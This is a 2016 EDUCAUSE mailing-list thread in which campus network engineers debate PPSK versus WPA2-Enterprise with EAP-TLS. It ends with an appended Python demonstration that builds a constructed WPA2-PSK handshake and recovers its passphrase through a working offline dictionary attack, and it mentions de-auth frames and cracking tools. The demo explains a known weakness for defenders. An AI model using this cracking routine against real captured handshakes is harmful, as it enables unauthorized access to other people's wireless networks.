Jeff, I agree with you. My ultimate model would be even open Wi-Fi everywhere with bulletproof applications and a set bandwidth per user (and locations agreeing on IP roaming).
While I'm writing this I'm waiting for my son at a free public electric car charging station. Out of 6 parking places one is taken by an electric car and all others are non-electric cars using the slots because it is close to the sport facility. Enforcement is nowhere to be seen (quite amazing BTW on a campus ;-). Human nature!

Network engineers need and like a few control knobs to control chaos. MAC addresses do not seem to be enough anymore. At the moment WPA2-Enterprise seems to fit a certain need, and as EAP-TLS becomes better supported in OSes many of us have bitten the PKI bullet without too much pain. I see EAP-TLS as a soft SIM card for Wi-Fi. Very powerful, and unlike a SIM card, it doesn't need to be controlled by a specific provider.

Philippe
www.eduroam.us

> On Nov 1, 2016, at 6:31 PM, Jeffrey D. Sessler <j...@scrippscollege.edu> wrote:
>
> I think the distinction between enterprise and residential blurred with the advent of SaaS and the cloud. No longer did an employee need to be "at the office" to enter their hours worked in the time and attendance system, or as an administrator, you no longer had to run the accounting application from your office computer. It's difficult for me to name anything we're doing here now that isn't some form of web-based SaaS model, where the expectation is that an employee (barring overtime rules) can access these systems from any location. If an employee can access these systems from Starbucks for the 16 hours a day they aren't at work, what's the point of WPA2-Ent for the other 8?
>
> I'm of the mindset that WPA2-Enterprise may in fact be an endangered species. I think most will come to accept that something like PPSK is "good enough". Users don't want significant barriers to getting access to what they need, and once those barriers reach a certain level, the user will absolutely find alternatives, i.e. I've visited many colleges where it was easier to use my MiFi hotspot than to be forced through a cumbersome on-boarding system where there are restrictions, be it on services available or data rates.
>
> Taken to the extreme: at the point you no longer have a local data center and everything is SaaS, can an argument for WPA2-Ent still be made?
>
> Jeff
>
> On 11/1/16, 3:03 PM, "The EDUCAUSE Wireless Issues Constituent Group Listserv on behalf of Curtis K. Larsen" <WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU on behalf of curtis.k.lar...@utah.edu> wrote:
>
> Well, I think users in general expect that when they connect to the "Secure" wireless network it is both encrypted and they are not being impersonated. If not, maybe you could allow them to opt out after accepting the risk. Often these are the same credentials that staff use to log in and set the direct deposit for their paycheck, credentials faculty use to post grades, and students use to add/drop classes. The business could also opt out if they are willing to accept the risk. But as the Enterprise Wireless Engineer you should at least make everyone aware that with PPSK there are still risks. Also, I just think one of these standards was intended to be mostly for residential purposes and the other for mostly enterprise purposes. When you look at federated authentication as in eduroam or Hotspot 2.0, etc., WPA2-Ent. just seems to fit better long-term. In short, I think the difficult/expensive parts of PKI/EAP-TLS have recently become a lot easier and I think they'll continue to do so.
>
> -Curtis
>
> ________________________________________
> From: The EDUCAUSE Wireless Issues Constituent Group Listserv <WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU> on behalf of Chuck Enfield <chu...@psu.edu>
> Sent: Tuesday, November 1, 2016 2:54 PM
> To: WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU
> Subject: Re: [WIRELESS-LAN] TLS Onboarding Vendors
>
> "If we can agree that most applications today (including ones that involve FERPA or PII) are web-based (let's toss in cloud too), and a user can access them from any location including at home on a PSK protected SSID (or cellular connection, or open network at Starbucks), does forcing WPA2-Ent at the campus actually result in reduced risk? Is there cost justification for the infrastructure (staff, hardware, software) necessary to implement EAP-TLS (or alternatives)?"
>
> Where's the like button? FWIW, I still like enterprise encryption and authentication for keeping people off of my network. It's nevertheless useful to remind ourselves of precisely what the value is, and it's not protecting the data.
>
> Chuck
>
> -----Original Message-----
> From: The EDUCAUSE Wireless Issues Constituent Group Listserv [mailto:WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU] On Behalf Of Jeffrey D. Sessler
> Sent: Tuesday, November 01, 2016 4:41 PM
> To: WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU
> Subject: Re: [WIRELESS-LAN] TLS Onboarding Vendors
>
> Curtis,
>
> If we can agree that most applications today (including ones that involve FERPA or PII) are web-based (let's toss in cloud too), and a user can access them from any location including at home on a PSK protected SSID (or cellular connection, or open network at Starbucks), does forcing WPA2-Ent at the campus actually result in reduced risk? Is there cost justification for the infrastructure (staff, hardware, software) necessary to implement EAP-TLS (or alternatives)?
>
> Our Admissions process starts with getting Common App (filled out by student/parents at home on a website and includes a lot of sensitive info); that data feeds into Slate (another cloud-based Admissions package), then feeds into financial aid and the SIS (again web-based for the users). The bulk of the PII/FERPA items have then been collected outside of the college environment, from connections that may have Starbucks level of protection. I'm trying to see the justification of WPA2-Ent, but it's a hard sell. Sure, I know there can be advantages, but are they necessary and/or justified? Is PPSK good enough for everyone? Is it good enough for students and their devices?
>
> Jeff
>
> On 11/1/16, 8:56 AM, "The EDUCAUSE Wireless Issues Constituent Group Listserv on behalf of Curtis K. Larsen" <WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU on behalf of curtis.k.lar...@utah.edu> wrote:
>
> I personally would *not* prefer PPSK for devices that are WPA2-Ent. (EAP-TLS) capable. PPSK has a nice niche in the IoT device category for devices that do not support WPA2-Ent. (EAP-TLS) in my opinion, and we'll be anxious to use it there when our vendor delivers ...but the same vulnerabilities around a regular WPA2-PSK are still there (de-auths, brute forcing). So, for IoT in student housing (game consoles and Roku devices that only do PSK) maybe PPSK is the appropriate new level of security because sensitive data is unlikely, but for the most common devices (Phone, Laptop, Tablet, etc.) where users are more likely to access and transmit FERPA, PHI, etc., WPA2-Enterprise with EAP-TLS seems more appropriate. From what I can tell it is probably easier to implement EAP-TLS than PPSK amongst the fully-managed portion of that device class anyway (thinking GPO here).
>
> In my ideal world I would have 3 SSIDs: one Guest SSID unencrypted, one PPSK SSID that accommodates all of the non-dot1x capable devices that are not guest users, and one dot1x WPA2-Ent (EAP-TLS) SSID for traditional Student/Faculty/Staff devices (Phone, Laptop, Tablet). Then someday in the future Hotspot 2.0/802.11u would convert many of the unencrypted guests over to encrypted without any captive portal interaction.
>
> --
> Curtis K. Larsen
> Senior Network Engineer
> University of Utah IT/CIS
>
> ________________________________________
> From: The EDUCAUSE Wireless Issues Constituent Group Listserv <WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU> on behalf of Coehoorn, Joel <jcoeho...@york.edu>
> Sent: Tuesday, November 1, 2016 8:33 AM
> To: WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU
> Subject: Re: [WIRELESS-LAN] TLS Onboarding Vendors
>
>> If those using or considering TLS had the option of PPSK (personal pre-shared key), would you opt for PPSK instead?
>
> Definitely. I think it's a much more user-friendly option, while providing similar control and security as TLS.
>
> Joel Coehoorn
> Director of Information Technology
> 402.363.5603
> jcoeho...@york.edu
>
> The mission of York College is to transform lives through Christ-centered education and to equip students for lifelong service to God, family, and society
>
> On Tue, Nov 1, 2016 at 9:12 AM, Jeffrey D. Sessler <j...@scrippscollege.edu> wrote:
>
> Just curious. If those using or considering TLS had the option of PPSK (personal pre-shared key), would you opt for PPSK instead?
>
> Jeff
>
> On 10/31/16, 9:27 AM, "The EDUCAUSE Wireless Issues Constituent Group Listserv on behalf of Bruce Boardman" <WIRELESS-LAN@LISTSERV.EDUCAUSE.EDU on behalf of board...@syr.edu> wrote:
>
> We are using Cloud Path for onboarding, but we are considering other options if and when we go to EAP TLS. We may get it baked in if we use ISE or Clear Pass, but I am considering other standalone options as well. Anybody have experience or thoughts they'd like to share? Thanks
>
> Bruce Boardman
> Networking
> Syracuse University
> 315 412-4156
> Skype board...@syr.edu
>
> **********
> Participation and subscription information for this EDUCAUSE Constituent Group discussion list can be found at http://www.educause.edu/groups/.
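Curtis's point in the quoted thread, that PPSK keeps the exposures of an ordinary WPA2-PSK (de-auths, brute forcing), is easiest to see mechanically. The Python below is an added example for this page and is not code from anyone on the list or from any vendor mentioned. It builds a WPA2-PSK (CCMP) 4-way handshake "capture" from a known passphrase using the 802.11i derivations (PBKDF2 for the PMK, PRF-512 for the PTK, HMAC-SHA1 for the key MIC), then recovers the passphrase offline from nothing but the sniffable fields. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed inline, and the EAPOL message 2 body is an arbitrary stand-in for the real frame, since the MIC check only needs the frame with its MIC field zeroed. This generalizes the thread's remark to any WPA2-PSK, per-user or shared: a captured handshake lets an attacker guess that handshake's passphrase without ever talking to the AP again.

```python
import hashlib
import hmac

# Constructed demonstration of the WPA2-PSK key schedule and the offline
# dictionary attack it permits. Not vendor code; all inputs are made up.


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    With a shared PSK the PMK is the same for every user of the SSID;
    with PPSK it is fixed per user, but derived exactly the same way."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK plus values visible in the air: both MACs, both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """Key MIC for CCMP (key descriptor version 2): HMAC-SHA1 truncated to 16 bytes.
    The KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def build_handshake(passphrase: str, ssid: str) -> dict:
    """Constructed 4-way handshake 'capture': only what a sniffer would see.
    A de-auth frame is how an attacker forces a client to redo this handshake."""
    aa = bytes.fromhex("001122334455")       # AP MAC (constructed)
    spa = bytes.fromhex("66778899aabb")      # station MAC (constructed)
    anonce = hashlib.sha256(b"anonce-demo").digest()   # constructed nonces
    snonce = hashlib.sha256(b"snonce-demo").digest()
    # Message 2 body with its 16-byte MIC field zeroed (constructed stand-in
    # for the real EAPOL-Key frame; the real one carries SNonce in the clear).
    eapol_m2 = (b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 8
                + snonce + b"\x00" * 48)
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = ptk_from_pmk(pmk, aa, spa, anonce, snonce)[:16]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol_m2": eapol_m2, "mic": eapol_mic(kck, eapol_m2)}


def crack_psk(capture: dict, wordlist):
    """Offline dictionary attack: PMK -> PTK -> KCK per candidate, compare MICs.
    Nothing is sent to the AP, so lockouts or rate limits there do not help;
    only PBKDF2's 4096 iterations slow the guesser down."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = ptk_from_pmk(pmk, capture["aa"], capture["spa"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol_m2"]), capture["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    cap = build_handshake("GoUtes2016", "Campus-PPSK")
    print(crack_psk(cap, ["password", "welcome1", "GoUtes2016", "letmein"]))
```

On a real capture the SSID comes from the beacon, the MACs and nonces from EAPOL messages 1 and 2, and the MIC from message 2; tools such as aircrack-ng and hashcat run the same PBKDF2 loop, only faster. What PPSK changes is the blast radius (a cracked handshake yields one user's key rather than everyone's), not the attack itself. EAP-TLS is outside this loop because its PMK is exported from the TLS exchange rather than derived from a guessable passphrase.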